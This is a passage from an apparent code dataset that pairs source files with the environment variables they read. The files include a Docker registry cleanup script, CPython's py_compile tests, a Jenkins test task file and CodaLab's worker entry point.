infof("\n🚀 https://github.com/%s/%s has been updated\n", owner, repo)
return nil
}
func (a *app) getRepository(ctx context.Context, owner, repo string) (*github.Repository, error) {
a.spinner.Start(color.CyanString("🤖 fetching %s/%s...", owner, repo))
defer a.spinner.Stop()
return a.githubClient.GetRepository(ctx, owner, repo)
}
| [
"\"GITHUB_TOKEN\""
]
| []
| [
"GITHUB_TOKEN"
]
| [] | ["GITHUB_TOKEN"] | go | 1 | 0 | |
chapter04/orm_field_demo/orm_field_demo/wsgi.py | """
WSGI config for orm_field_demo project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "orm_field_demo.settings")
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
Lib/test/test_py_compile.py | import functools
import importlib.util
import os
import py_compile
import shutil
import stat
import subprocess
import sys
import tempfile
import unittest
from test import support
from test.support import os_helper, script_helper
def without_source_date_epoch(fxn):
"""Runs function with SOURCE_DATE_EPOCH unset."""
@functools.wraps(fxn)
def wrapper(*args, **kwargs):
with os_helper.EnvironmentVarGuard() as env:
env.unset('SOURCE_DATE_EPOCH')
return fxn(*args, **kwargs)
return wrapper
def with_source_date_epoch(fxn):
"""Runs function with SOURCE_DATE_EPOCH set."""
@functools.wraps(fxn)
def wrapper(*args, **kwargs):
with os_helper.EnvironmentVarGuard() as env:
env['SOURCE_DATE_EPOCH'] = '123456789'
return fxn(*args, **kwargs)
return wrapper
# Run tests with SOURCE_DATE_EPOCH set or unset explicitly.
class SourceDateEpochTestMeta(type(unittest.TestCase)):
def __new__(mcls, name, bases, dct, *, source_date_epoch):
cls = super().__new__(mcls, name, bases, dct)
for attr in dir(cls):
if attr.startswith('test_'):
meth = getattr(cls, attr)
if source_date_epoch:
wrapper = with_source_date_epoch(meth)
else:
wrapper = without_source_date_epoch(meth)
setattr(cls, attr, wrapper)
return cls
class PyCompileTestsBase:
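    """Shared py_compile test cases, reused by the SOURCE_DATE_EPOCH-specific subclasses below."""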
def setUp(self):
self.directory = tempfile.mkdtemp(dir=os.getcwd())
self.source_path = os.path.join(self.directory, '_test.py')
self.pyc_path = self.source_path + 'c'
self.cache_path = importlib.util.cache_from_source(self.source_path)
self.cwd_drive = os.path.splitdrive(os.getcwd())[0]
# In these tests we compute relative paths. When using Windows, the
# current working directory path and the 'self.source_path' might be
# on different drives. Therefore we need to switch to the drive where
# the temporary source file lives.
drive = os.path.splitdrive(self.source_path)[0]
if drive:
os.chdir(drive)
with open(self.source_path, 'w') as file:
file.write('x = 123\n')
def tearDown(self):
shutil.rmtree(self.directory)
if self.cwd_drive:
os.chdir(self.cwd_drive)
def test_absolute_path(self):
py_compile.compile(self.source_path, self.pyc_path)
self.assertTrue(os.path.exists(self.pyc_path))
self.assertFalse(os.path.exists(self.cache_path))
def test_do_not_overwrite_symlinks(self):
# In the face of a cfile argument being a symlink, bail out.
# Issue #17222
try:
os.symlink(self.pyc_path + '.actual', self.pyc_path)
except (NotImplementedError, OSError):
self.skipTest('need to be able to create a symlink for a file')
else:
assert os.path.islink(self.pyc_path)
with self.assertRaises(FileExistsError):
py_compile.compile(self.source_path, self.pyc_path)
@unittest.skipIf(not os.path.exists(os.devnull) or os.path.isfile(os.devnull),
'requires os.devnull and for it to be a non-regular file')
def test_do_not_overwrite_nonregular_files(self):
# In the face of a cfile argument being a non-regular file, bail out.
# Issue #17222
with self.assertRaises(FileExistsError):
py_compile.compile(self.source_path, os.devnull)
def test_cache_path(self):
py_compile.compile(self.source_path)
self.assertTrue(os.path.exists(self.cache_path))
def test_cwd(self):
with os_helper.change_cwd(self.directory):
py_compile.compile(os.path.basename(self.source_path),
os.path.basename(self.pyc_path))
self.assertTrue(os.path.exists(self.pyc_path))
self.assertFalse(os.path.exists(self.cache_path))
def test_relative_path(self):
py_compile.compile(os.path.relpath(self.source_path),
os.path.relpath(self.pyc_path))
self.assertTrue(os.path.exists(self.pyc_path))
self.assertFalse(os.path.exists(self.cache_path))
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
'non-root user required')
@unittest.skipIf(os.name == 'nt',
'cannot control directory permissions on Windows')
def test_exceptions_propagate(self):
        # Make sure that exceptions raised due to issues with writing
        # bytecode are propagated.
# http://bugs.python.org/issue17244
mode = os.stat(self.directory)
os.chmod(self.directory, stat.S_IREAD)
try:
with self.assertRaises(IOError):
py_compile.compile(self.source_path, self.pyc_path)
finally:
os.chmod(self.directory, mode.st_mode)
def test_bad_coding(self):
bad_coding = os.path.join(os.path.dirname(__file__), 'bad_coding2.py')
with support.captured_stderr():
self.assertIsNone(py_compile.compile(bad_coding, doraise=False))
self.assertFalse(os.path.exists(
importlib.util.cache_from_source(bad_coding)))
def test_source_date_epoch(self):
py_compile.compile(self.source_path, self.pyc_path)
self.assertTrue(os.path.exists(self.pyc_path))
self.assertFalse(os.path.exists(self.cache_path))
with open(self.pyc_path, 'rb') as fp:
flags = importlib._bootstrap_external._classify_pyc(
fp.read(), 'test', {})
if os.environ.get('SOURCE_DATE_EPOCH'):
expected_flags = 0b11
else:
expected_flags = 0b00
self.assertEqual(flags, expected_flags)
@unittest.skipIf(sys.flags.optimize > 0, 'test does not work with -O')
def test_double_dot_no_clobber(self):
# http://bugs.python.org/issue22966
# py_compile foo.bar.py -> __pycache__/foo.cpython-34.pyc
weird_path = os.path.join(self.directory, 'foo.bar.py')
cache_path = importlib.util.cache_from_source(weird_path)
pyc_path = weird_path + 'c'
head, tail = os.path.split(cache_path)
penultimate_tail = os.path.basename(head)
self.assertEqual(
os.path.join(penultimate_tail, tail),
os.path.join(
'__pycache__',
'foo.bar.{}.pyc'.format(sys.implementation.cache_tag)))
with open(weird_path, 'w') as file:
file.write('x = 123\n')
py_compile.compile(weird_path)
self.assertTrue(os.path.exists(cache_path))
self.assertFalse(os.path.exists(pyc_path))
def test_optimization_path(self):
# Specifying optimized bytecode should lead to a path reflecting that.
self.assertIn('opt-2', py_compile.compile(self.source_path, optimize=2))
def test_invalidation_mode(self):
py_compile.compile(
self.source_path,
invalidation_mode=py_compile.PycInvalidationMode.CHECKED_HASH,
)
with open(self.cache_path, 'rb') as fp:
flags = importlib._bootstrap_external._classify_pyc(
fp.read(), 'test', {})
self.assertEqual(flags, 0b11)
py_compile.compile(
self.source_path,
invalidation_mode=py_compile.PycInvalidationMode.UNCHECKED_HASH,
)
with open(self.cache_path, 'rb') as fp:
flags = importlib._bootstrap_external._classify_pyc(
fp.read(), 'test', {})
self.assertEqual(flags, 0b1)
def test_quiet(self):
bad_coding = os.path.join(os.path.dirname(__file__), 'bad_coding2.py')
with support.captured_stderr() as stderr:
self.assertIsNone(py_compile.compile(bad_coding, doraise=False, quiet=2))
self.assertIsNone(py_compile.compile(bad_coding, doraise=True, quiet=2))
self.assertEqual(stderr.getvalue(), '')
with self.assertRaises(py_compile.PyCompileError):
py_compile.compile(bad_coding, doraise=True, quiet=1)
class PyCompileTestsWithSourceEpoch(PyCompileTestsBase,
unittest.TestCase,
metaclass=SourceDateEpochTestMeta,
source_date_epoch=True):
pass
class PyCompileTestsWithoutSourceEpoch(PyCompileTestsBase,
unittest.TestCase,
metaclass=SourceDateEpochTestMeta,
source_date_epoch=False):
pass
class PyCompileCLITestCase(unittest.TestCase):
def setUp(self):
self.directory = tempfile.mkdtemp()
self.source_path = os.path.join(self.directory, '_test.py')
self.cache_path = importlib.util.cache_from_source(self.source_path)
with open(self.source_path, 'w') as file:
file.write('x = 123\n')
def tearDown(self):
os_helper.rmtree(self.directory)
@support.requires_subprocess()
def pycompilecmd(self, *args, **kwargs):
# assert_python_* helpers don't return proc object. We'll just use
# subprocess.run() instead of spawn_python() and its friends to test
# stdin support of the CLI.
if args and args[0] == '-' and 'input' in kwargs:
return subprocess.run([sys.executable, '-m', 'py_compile', '-'],
input=kwargs['input'].encode(),
capture_output=True)
return script_helper.assert_python_ok('-m', 'py_compile', *args, **kwargs)
def pycompilecmd_failure(self, *args):
return script_helper.assert_python_failure('-m', 'py_compile', *args)
def test_stdin(self):
result = self.pycompilecmd('-', input=self.source_path)
self.assertEqual(result.returncode, 0)
self.assertEqual(result.stdout, b'')
self.assertEqual(result.stderr, b'')
self.assertTrue(os.path.exists(self.cache_path))
def test_with_files(self):
rc, stdout, stderr = self.pycompilecmd(self.source_path, self.source_path)
self.assertEqual(rc, 0)
self.assertEqual(stdout, b'')
self.assertEqual(stderr, b'')
self.assertTrue(os.path.exists(self.cache_path))
def test_bad_syntax(self):
bad_syntax = os.path.join(os.path.dirname(__file__), 'badsyntax_3131.py')
rc, stdout, stderr = self.pycompilecmd_failure(bad_syntax)
self.assertEqual(rc, 1)
self.assertEqual(stdout, b'')
self.assertIn(b'SyntaxError', stderr)
def test_bad_syntax_with_quiet(self):
bad_syntax = os.path.join(os.path.dirname(__file__), 'badsyntax_3131.py')
rc, stdout, stderr = self.pycompilecmd_failure('-q', bad_syntax)
self.assertEqual(rc, 1)
self.assertEqual(stdout, b'')
self.assertEqual(stderr, b'')
def test_file_not_exists(self):
should_not_exists = os.path.join(os.path.dirname(__file__), 'should_not_exists.py')
rc, stdout, stderr = self.pycompilecmd_failure(self.source_path, should_not_exists)
self.assertEqual(rc, 1)
self.assertEqual(stdout, b'')
self.assertIn(b'no such file or directory', stderr.lower())
def test_file_not_exists_with_quiet(self):
should_not_exists = os.path.join(os.path.dirname(__file__), 'should_not_exists.py')
rc, stdout, stderr = self.pycompilecmd_failure('-q', self.source_path, should_not_exists)
self.assertEqual(rc, 1)
self.assertEqual(stdout, b'')
self.assertEqual(stderr, b'')
if __name__ == "__main__":
unittest.main()
| []
| []
| [
"SOURCE_DATE_EPOCH"
]
| [] | ["SOURCE_DATE_EPOCH"] | python | 1 | 0 | |
docker-registry-cleanup.py | import glob
import urllib3
from requests.auth import HTTPBasicAuth
import requests
import json
import re
import os
import boto
from boto.s3.key import Key
############################
######## Functions #########
############################
def exit_with_error(message):
print(message)
print("Exiting")
exit(1)
# Initial setup
try:
if "DRY_RUN" in os.environ and os.environ['DRY_RUN'] == "true":
dry_run_mode = True
print("Running in dry-run mode. No changes will be made.")
print()
else:
dry_run_mode = False
if "REGISTRY_STORAGE" in os.environ and os.environ['REGISTRY_STORAGE'] == "S3":
print("Running against S3 storage")
storage_on_s3 = True
s3_access_key = os.environ['ACCESS_KEY']
s3_secret_key = os.environ['SECRET_KEY']
s3_bucket = os.environ['BUCKET']
s3_region = os.environ['REGION']
if "REGISTRY_DIR" in os.environ:
registry_dir = os.environ['REGISTRY_DIR']
else:
registry_dir = "/"
else:
print("Running against local storage")
storage_on_s3 = False
if "REGISTRY_DIR" in os.environ:
registry_dir = os.environ['REGISTRY_DIR']
else:
registry_dir = "/registry"
registry_url = os.environ['REGISTRY_URL']
except KeyError as e:
exit_with_error("Missing environment variable: %s" % (e))
# Optional vars
if "REGISTRY_AUTH" in os.environ:
registry_auth = HTTPBasicAuth(os.environ["REGISTRY_AUTH"].split(":")[0], os.environ["REGISTRY_AUTH"].split(":")[1])
else:
registry_auth = {}
if "SELF_SIGNED_CERT" in os.environ:
cert_verify = False
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
else:
cert_verify = True
token_authentication = False
token_auth_details = {}
# Check connection to registry
try:
r = requests.get("%s/v2/" % (registry_url), auth=registry_auth, verify=cert_verify)
if r.status_code == 401:
if "Www-Authenticate" in r.headers and "Bearer" in r.headers["Www-Authenticate"]:
#We have token based auth, try it
auth_header = r.headers["Www-Authenticate"].split(" ")[1]
token_authentication = True
token_auth_details = dict(s.split("=", 1) for s in re.sub('"',"",auth_header).split(","))
r2 = requests.get("%s?service=%s&scope=" % (token_auth_details["realm"],token_auth_details["service"]), auth=registry_auth, verify=cert_verify)
if r2.status_code == 401:
exit_with_error("Got an authentication error connecting to the registry - even with token authentication. Check credentials, or add REGISTRY_AUTH='username:password'")
else:
auth_token = r2.json()["token"]
registry_headers = {"Authorization": "Bearer %s" % (auth_token)}
else:
exit_with_error("Got an authentication error connecting to the registry. Check credentials, or add REGISTRY_AUTH='username:password'")
except requests.exceptions.SSLError as e:
exit_with_error("Got an SSLError connecting to the registry. Might be a self signed cert, please set SELF_SIGNED_CERT=true")
except requests.exceptions.RequestException as e:
exit_with_error("Could not contact registry at %s - error: %s" % (registry_url, e))
# Set variables
repo_dir = registry_dir + "/docker/registry/v2/repositories"
blob_dir = registry_dir + "/docker/registry/v2/blobs"
all_manifests = set()
linked_manifests = set()
linked_manifest_files = set()
file_list = set()
if storage_on_s3:
bucket_size = 0
# Connect to bucket
conn = boto.s3.connect_to_region(s3_region, aws_access_key_id=s3_access_key, aws_secret_access_key=s3_secret_key)
bucket = conn.get_bucket(s3_bucket)
s3_file_list = bucket.list()
#get all the filenames in bucket as well as size
for key in s3_file_list:
bucket_size += key.size
file_list.add(key.name)
else:
#local storage
for filename in glob.iglob("%s/**" % (registry_dir), recursive=True):
if os.path.isfile(filename):
file_list.add(filename)
for filename in file_list:
if filename.endswith("link"):
if "_manifests/revisions/sha256" in filename:
all_manifests.add(re.sub('.*docker/registry/v2/repositories/.*/_manifests/revisions/sha256/(.*)/link','\\1',filename))
elif "_manifests/tags/" in filename and filename.endswith("/current/link"):
linked_manifest_files.add(filename)
#fetch linked_manifest_files
for filename in linked_manifest_files:
error = False
if storage_on_s3:
k = Key(bucket)
k.key = filename
#Get the shasum from the link file
shasum = k.get_contents_as_string().decode().split(":")[1]
        # Get the manifest json to check if it's a manifest list
k.key = "%s/sha256/%s/%s/data" % (blob_dir, shasum[0:2], shasum)
try:
manifest = json.loads(k.get_contents_as_string().decode())
except Exception as e:
error = True
print("Caught error trying to read manifest, ignoring.")
else:
shasum = open(filename, 'r').read().split(":")[1]
try:
manifest = json.loads(open("%s/sha256/%s/%s/data" % (blob_dir, shasum[0:2], shasum)).read())
except Exception as e:
error = True
print("Caught error trying to read manifest, ignoring: ", filename)
if error:
linked_manifests.add(shasum)
else:
try:
manifest_media_type = manifest["mediaType"]
except:
manifest_media_type = ""
if manifest_media_type == "application/vnd.docker.distribution.manifest.list.v2+json":
#add all manifests from manifest list
for mf in manifest["manifests"]:
linked_manifests.add(mf["digest"])
else:
linked_manifests.add(shasum)
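# Manifests that are not reachable from any tag (directly or via a manifest list) are unused.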
unused_manifests = all_manifests - linked_manifests
if len(unused_manifests) == 0:
print("No manifests without tags found. Nothing to do.")
if storage_on_s3:
print("For reference, the size of the bucket is currently: %s bytes" % (bucket_size))
else:
print("Found " + str(len(unused_manifests)) + " manifests without tags. Deleting")
#counters
current_count = 0
cleaned_count = 0
failed_count = 0
total_count = len(unused_manifests)
for manifest in unused_manifests:
current_count += 1
status_msg = "Cleaning %s of %s" % (current_count, total_count)
if "DRY_RUN" in os.environ and os.environ['DRY_RUN'] == "true":
status_msg += " ..not really, due to dry-run mode"
print(status_msg)
#get repos
repos = set()
for file in file_list:
if "_manifests/revisions/sha256/%s" % (manifest) in file and file.endswith("link"):
repos.add(re.sub(".*docker/registry/v2/repositories/(.*)/_manifests/revisions/sha256.*", "\\1", file))
for repo in repos:
if dry_run_mode:
print("DRY_RUN: Would have run an HTTP DELETE request to %s/v2/%s/manifests/sha256:%s" % (registry_url, repo, manifest))
else:
if token_authentication:
r2 = requests.get("%s?service=%s&scope=repository:%s:*" % (token_auth_details["realm"],token_auth_details["service"],repo), auth=registry_auth, verify=cert_verify)
auth_token = r2.json()["token"]
registry_headers = {"Authorization": "Bearer %s" % (auth_token)}
r = requests.delete("%s/v2/%s/manifests/sha256:%s" % (registry_url, repo, manifest), verify=cert_verify, headers=registry_headers)
else:
r = requests.delete("%s/v2/%s/manifests/sha256:%s" % (registry_url, repo, manifest), auth=registry_auth, verify=cert_verify)
if r.status_code == 202:
cleaned_count += 1
else:
failed_count += 1
print("Failed to clean manifest %s from repo %s with response code %s" % (manifest, repo, r.status_code))
print("Job done, Cleaned %s of %s manifests." % (cleaned_count, total_count))
print()
print()
if storage_on_s3:
print("For reference, the size of the bucket before this run was: %s bytes" % (bucket_size))
print()
print("Please run a garbage-collect on the registry now to free up disk space.")
| []
| []
| [
"ACCESS_KEY",
"BUCKET",
"REGISTRY_DIR",
"REGISTRY_AUTH",
"REGISTRY_URL",
"SECRET_KEY",
"REGION",
"DRY_RUN",
"REGISTRY_STORAGE"
]
| [] | ["ACCESS_KEY", "BUCKET", "REGISTRY_DIR", "REGISTRY_AUTH", "REGISTRY_URL", "SECRET_KEY", "REGION", "DRY_RUN", "REGISTRY_STORAGE"] | python | 9 | 0 | |
python/cinn/__init__.py | # Copyright (c) 2021 CINN Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
cinndir = os.path.dirname(os.path.abspath(__file__))
runtime_include_dir = os.path.join(cinndir, "libs")
cuhfile = os.path.join(runtime_include_dir, "cinn_cuda_runtime_source.cuh")
if os.path.exists(cuhfile):
os.environ['runtime_include_dir'] = runtime_include_dir
from .core_api.common import *
from .core_api.backends import *
from .core_api.poly import *
from .core_api.ir import *
from .core_api.lang import *
from .version import full_version as __version__
| []
| []
| [
"runtime_include_dir"
]
| [] | ["runtime_include_dir"] | python | 1 | 0 | |
tasks.py | import os
from invoke import task
from tests.refapi import JenkinsCLI
from tests.install import JenkinsInstall
JENKINS_WAR_URL = 'http://mirrors.jenkins-ci.org/war/latest/jenkins.war'
JENKINS_CLI_JAR = 'tests/tmp/latest/jenkins-cli.jar'
JENKINS_HOST = 'localhost'
JENKINS_PORT = 60888
JENKINS_CPORT = 60887
JENKINS_DESTDIR = os.path.join(os.environ.get('TMPDIR', '/tmp'), 'jenkins-webapi-tests/jenkins-latest')
@task(name='start-jenkins')
def start_jenkins(ctx):
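    """Download the latest Jenkins WAR, install it under JENKINS_DESTDIR and wait until it responds."""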
config = {
'url': JENKINS_WAR_URL,
'destdir': JENKINS_DESTDIR,
'host': JENKINS_HOST,
'port': JENKINS_PORT,
'cport': JENKINS_CPORT,
}
ji = JenkinsInstall(**config)
ji.bootstrap()
ji.start()
ji.wait()
@task(name='stop-jenkins')
def stop_jenkins(ctx):
ctx.run('echo 0 | nc %s %s' % (JENKINS_HOST, JENKINS_CPORT))
@task(name='remove-jobs')
def remove_jobs(ctx):
url = 'http://%s:%s' % (JENKINS_HOST, JENKINS_PORT)
cli = JenkinsCLI(url, JENKINS_CLI_JAR)
for job in cli.jobs():
cli.delete_job(job)
@task
def test(ctx):
ctx.run('py.test tests -xvs')
@task
def coverage(ctx):
ctx.run('py.test --cov-report term-missing --cov jenkins tests')
| []
| []
| [
"TMPDIR"
]
| [] | ["TMPDIR"] | python | 1 | 0 | |
codalab/worker/main.py | #!/usr/bin/env python3
# For information about the design of the worker, see design.pdf in the same
# directory as this file. For information about running a worker, see the
# tutorial on the CodaLab documentation.
import argparse
import getpass
import os
import logging
import signal
import socket
import stat
import sys
import psutil
import requests
from codalab.common import SingularityError
from codalab.lib.formatting import parse_size
from codalab.lib.telemetry_util import initialize_sentry, load_sentry_data, using_sentry
from .bundle_service_client import BundleServiceClient, BundleAuthException
from . import docker_utils
from .worker import Worker
from codalab.worker.dependency_manager import DependencyManager
from codalab.worker.docker_image_manager import DockerImageManager
from codalab.worker.singularity_image_manager import SingularityImageManager
logger = logging.getLogger(__name__)
DEFAULT_EXIT_AFTER_NUM_RUNS = 999999999
def parse_args():
parser = argparse.ArgumentParser(description='CodaLab worker.')
parser.add_argument(
'--tag',
help='Tag (can only contain letters, numbers or hyphens) that allows for scheduling runs on specific workers.',
)
parser.add_argument(
'--server',
default='https://worksheets.codalab.org',
help='URL of the CodaLab server, in the format '
'<http|https>://<hostname>[:<port>] (e.g., https://worksheets.codalab.org)',
)
parser.add_argument(
'--work-dir',
default='codalab-worker-scratch',
help='Directory where to store temporary bundle data, '
'including dependencies and the data from run '
'bundles.',
)
parser.add_argument(
'--network-prefix', default='codalab_worker_network', help='Docker network name prefix'
)
parser.add_argument(
'--cpuset',
type=parse_cpuset_args,
metavar='CPUSET_STR',
default='ALL',
help='Comma-separated list of CPUs in which to allow bundle execution, '
'(e.g., \"0,2,3\", \"1\").',
)
parser.add_argument(
'--gpuset',
type=parse_gpuset_args,
metavar='GPUSET_STR',
default='ALL',
help='Comma-separated list of GPUs in which to allow bundle execution. '
'Each GPU can be specified by its index or UUID'
'(e.g., \"0,1\", \"1\", \"GPU-62casdfasd-asfas...\"',
)
parser.add_argument(
'--max-work-dir-size',
type=parse_size,
metavar='SIZE',
default='10g',
help='Maximum size of the temporary bundle data ' '(e.g., 3, 3k, 3m, 3g, 3t).',
)
parser.add_argument(
'--max-image-cache-size',
type=parse_size,
metavar='SIZE',
default=None,
help='Limit the disk space used to cache Docker images '
'for worker jobs to the specified amount (e.g. '
'3, 3k, 3m, 3g, 3t). If the limit is exceeded, '
'the least recently used images are removed first. '
'Worker will not remove any images if this option '
'is not specified.',
)
parser.add_argument(
'--max-image-size',
type=parse_size,
metavar='SIZE',
default=None,
help='Limit the size of Docker images to download from the Docker Hub'
'(e.g. 3, 3k, 3m, 3g, 3t). If the limit is exceeded, '
'the requested image will not be downloaded. '
'The bundle depends on this image will fail accordingly. '
'If running an image on the singularity runtime, there is no size '
'check because singularity hub does not support the querying of image size',
)
parser.add_argument(
'--max-memory',
type=parse_size,
metavar='SIZE',
default=None,
        help='Limit the amount of memory available to a worker, in bytes ' '(e.g. 3, 3k, 3m, 3g, 3t).',
)
parser.add_argument(
'--password-file',
help='Path to the file containing the username and '
'password for logging into the bundle service, '
'each on a separate line. If not specified, the '
'password is read from standard input.',
)
parser.add_argument(
'--verbose', action='store_true', help='Whether to output verbose log messages.'
)
parser.add_argument(
'--exit-when-idle',
action='store_true',
        help='If specified, the worker quits if it finds itself with no jobs after a checkin',
)
parser.add_argument(
'--container-runtime',
choices=['docker', 'singularity'],
default='docker',
help='The worker will run jobs on the specified backend. The options are docker (default) or singularity',
)
parser.add_argument(
'--idle-seconds',
help='Not running anything for this many seconds constitutes idle',
type=int,
default=0,
)
parser.add_argument(
'--checkin-frequency-seconds',
help='Number of seconds to wait between worker check-ins',
type=int,
default=5,
)
parser.add_argument(
'--id',
default='%s(%d)' % (socket.gethostname(), os.getpid()),
help='Internal use: ID to use for the worker.',
)
parser.add_argument(
'--shared-file-system',
action='store_true',
help='To be used when the server and the worker share the bundle store on their filesystems.',
)
parser.add_argument(
'--group', default=None, help='Name of the group that can run jobs on this worker'
)
parser.add_argument(
'--tag-exclusive',
action='store_true',
help='To be used when the worker should only run bundles that match the worker\'s tag.',
)
parser.add_argument(
'--pass-down-termination',
action='store_true',
help='Terminate the worker and kill all the existing running bundles.',
)
parser.add_argument(
'--delete-work-dir-on-exit',
action='store_true',
help="Delete the worker's working directory when the worker process exits.",
)
parser.add_argument(
'--exit-after-num-runs',
type=int,
default=DEFAULT_EXIT_AFTER_NUM_RUNS,
help='The worker quits after this many jobs assigned to this worker',
)
parser.add_argument(
'--exit-on-exception',
action='store_true',
help="Exit the worker if it encounters an exception (rather than sleeping).",
)
parser.add_argument(
'--download-dependencies-max-retries',
type=int,
default=3,
help='The number of times to retry downloading dependencies after a failure (defaults to 3).',
)
parser.add_argument(
'--shared-memory-size-gb',
type=int,
default=1,
help='The shared memory size of the run container in GB (defaults to 1).',
)
return parser.parse_args()
def connect_to_codalab_server(server, password_file):
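    """Log into the CodaLab server, reading credentials from the password file if given,
    otherwise from CODALAB_USERNAME/CODALAB_PASSWORD or interactive prompts."""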
# Get the username and password.
logger.info('Connecting to %s' % server)
if password_file:
if os.stat(password_file).st_mode & (stat.S_IRWXG | stat.S_IRWXO):
print(
"Permissions on password file are too lax.\n\
Only the user should be allowed to access the file.\n\
On Linux, run:\n\
chmod 600 %s"
% password_file,
file=sys.stderr,
)
sys.exit(1)
with open(password_file) as f:
username = f.readline().strip()
password = f.readline().strip()
else:
username = os.environ.get('CODALAB_USERNAME')
if username is None:
username = input('Username: ')
password = os.environ.get('CODALAB_PASSWORD')
if password is None:
password = getpass.getpass()
try:
bundle_service = BundleServiceClient(server, username, password)
return bundle_service
except BundleAuthException as ex:
logger.error(
'Cannot log into the bundle service. Please check your worker credentials.\n'
f'Username: "{username}" , server "{server}"\n'
)
logger.debug('Auth error: {}'.format(ex))
sys.exit(1)
def main():
args = parse_args()
if args.tag and not args.tag.replace("-", "").isalnum():
raise argparse.ArgumentTypeError(
"Worker tag must only contain letters, numbers or hyphens."
)
# Configure logging
log_format: str = '%(asctime)s %(message)s'
if args.verbose:
log_format += ' %(pathname)s %(lineno)d'
log_level = logging.DEBUG
else:
log_level = logging.INFO
logging.basicConfig(format=log_format, level=log_level)
logging.getLogger('urllib3').setLevel(logging.INFO)
# Initialize sentry logging
if using_sentry():
initialize_sentry()
# This quits if connection unsuccessful
bundle_service = connect_to_codalab_server(args.server, args.password_file)
# Load some data into sentry
if using_sentry():
load_sentry_data(username=bundle_service._username, **vars(args))
if args.shared_file_system:
# No need to store bundles locally if filesystems are shared
local_bundles_dir = None
# Also no need to download dependencies if they're on the filesystem already
dependency_manager = None
else:
local_bundles_dir = os.path.join(args.work_dir, 'runs')
dependency_manager = DependencyManager(
os.path.join(args.work_dir, 'dependencies-state.json'),
bundle_service,
args.work_dir,
args.max_work_dir_size,
args.download_dependencies_max_retries,
)
if args.container_runtime == "singularity":
singularity_folder = os.path.join(args.work_dir, 'codalab_singularity_images')
if not os.path.exists(singularity_folder):
logger.info(
'Local singularity image location %s doesn\'t exist, creating.', singularity_folder,
)
os.makedirs(singularity_folder, 0o770)
image_manager = SingularityImageManager(
args.max_image_size, args.max_image_cache_size, singularity_folder,
)
# todo workers with singularity don't work because this is set to none -- handle this
docker_runtime = None
else:
image_manager = DockerImageManager(
os.path.join(args.work_dir, 'images-state.json'),
args.max_image_cache_size,
args.max_image_size,
)
docker_runtime = docker_utils.get_available_runtime()
# Set up local directories
if not os.path.exists(args.work_dir):
logging.debug('Work dir %s doesn\'t exist, creating.', args.work_dir)
os.makedirs(args.work_dir, 0o770)
if local_bundles_dir and not os.path.exists(local_bundles_dir):
logger.info('%s doesn\'t exist, creating.', local_bundles_dir)
os.makedirs(local_bundles_dir, 0o770)
worker = Worker(
image_manager,
dependency_manager,
os.path.join(args.work_dir, 'worker-state.json'),
args.cpuset,
args.gpuset,
args.max_memory,
args.id,
args.tag,
args.work_dir,
local_bundles_dir,
args.exit_when_idle,
args.exit_after_num_runs,
args.idle_seconds,
args.checkin_frequency_seconds,
bundle_service,
args.shared_file_system,
args.tag_exclusive,
args.group,
docker_runtime=docker_runtime,
docker_network_prefix=args.network_prefix,
pass_down_termination=args.pass_down_termination,
delete_work_dir_on_exit=args.delete_work_dir_on_exit,
exit_on_exception=args.exit_on_exception,
shared_memory_size_gb=args.shared_memory_size_gb,
)
# Register a signal handler to ensure safe shutdown.
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP]:
signal.signal(sig, lambda signup, frame: worker.signal())
# BEGIN: DO NOT CHANGE THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING
# THIS IS HERE TO KEEP TEST-CLI FROM HANGING
logger.info('Worker started!')
# END
worker.start()
def parse_cpuset_args(arg):
"""
Parse given arg into a set of integers representing cpus
Arguments:
arg: comma separated string of ints, or "ALL" representing all available cpus
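    Illustrative examples (assuming os.sched_getaffinity is unavailable and the
    machine reports 4 physical cores, indices 0-3):
        parse_cpuset_args('ALL') -> {0, 1, 2, 3}
        parse_cpuset_args('0,2') -> {0, 2}
        parse_cpuset_args('0,9') -> raises argparse.ArgumentTypeError (CPU out of range)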
"""
try:
# Get the set of cores that the process can actually use.
        # For instance, on Slurm, the returned value may contain only 4 cores: {2,3,20,21}.
return os.sched_getaffinity(0)
except AttributeError:
# os.sched_getaffinity() isn't available on all platforms,
# so fallback to using the number of physical cores.
cpu_count = psutil.cpu_count(logical=False)
if arg == 'ALL':
cpuset = list(range(cpu_count))
else:
try:
cpuset = [int(s) for s in arg.split(',')]
except ValueError:
raise argparse.ArgumentTypeError(
"CPUSET_STR invalid format: must be a string of comma-separated integers"
)
if not len(cpuset) == len(set(cpuset)):
raise argparse.ArgumentTypeError("CPUSET_STR invalid: CPUs not distinct values")
if not all(cpu in range(cpu_count) for cpu in cpuset):
raise argparse.ArgumentTypeError("CPUSET_STR invalid: CPUs out of range")
return set(cpuset)
def parse_gpuset_args(arg):
"""
Parse given arg into a set of strings representing gpu UUIDs
    By default, we try to start a Docker container with nvidia-smi to get the GPUs.
    If we get an exception because the Docker socket does not exist (which is the case
    on Singularity workers, since they do not have root access and therefore no access
    to the Docker socket), we fall back to getting the GPUs with Singularity.
Arguments:
arg: comma separated string of ints, or "ALL" representing all gpus
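    Illustrative examples (the UUIDs below are made-up values):
        parse_gpuset_args('NONE') -> set()
        parse_gpuset_args('ALL')  -> {'GPU-aaaa', 'GPU-bbbb'} (all detected UUIDs)
        parse_gpuset_args('0')    -> {'GPU-aaaa'} (index resolved to its UUID)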
"""
logger.info(f"GPUSET arg: {arg}")
if arg == '' or arg == 'NONE':
return set()
try:
all_gpus = docker_utils.get_nvidia_devices() # Dict[GPU index: GPU UUID]
except docker_utils.DockerException:
all_gpus = {}
# Docker socket can't be used
except requests.exceptions.ConnectionError:
try:
all_gpus = docker_utils.get_nvidia_devices(use_docker=False)
except SingularityError:
